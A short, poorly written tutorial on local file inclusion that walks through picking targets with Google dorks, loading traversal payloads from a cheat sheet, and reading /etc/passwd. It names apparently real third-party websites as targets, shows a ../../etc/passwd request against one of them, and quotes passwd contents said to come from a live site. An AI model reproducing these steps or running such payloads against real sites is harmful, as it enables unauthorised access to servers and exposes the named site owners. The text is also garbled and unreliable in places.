LFI

Local Local file inclusion  Vulnerability  {LFI}

Through This vuln.. .an attacker can Read any arbitrary file form the server.

For example :  reading backed source code , configuration file, log file ,etc.

This vuln.. Arise when user controllable input is begin used to include a file form the server without proper checks.

For example : http//:test.com/index.php?page= contact.php

                                                                    page=/etc/passwd

Most of the servers use linux servers .

There have etc/passwd confidential file 

Google Dork : https://github.com/Hood3dRob1n/BinGoo/blob/master/dorks/LFI-dork.lst 

1. Get your target site using dork or anyway 

Example : https://www.ravagedband.com/index.php?page=biography.php 

2. Go to LFI → lfi cheat sheet → load any payload 

Then press enter 

Got this :    root:x:0:0:root:/root:/bin/false ravagedband.com:x:53224:53224:ravagedband.com:/home/ravagedband.com:/bin/false  

Example site : 

→ Not worked in first attempt 

→  Not worked

→ https://confituredebali.com/index.php?page=../../../../../../../../../../../../etc/passwd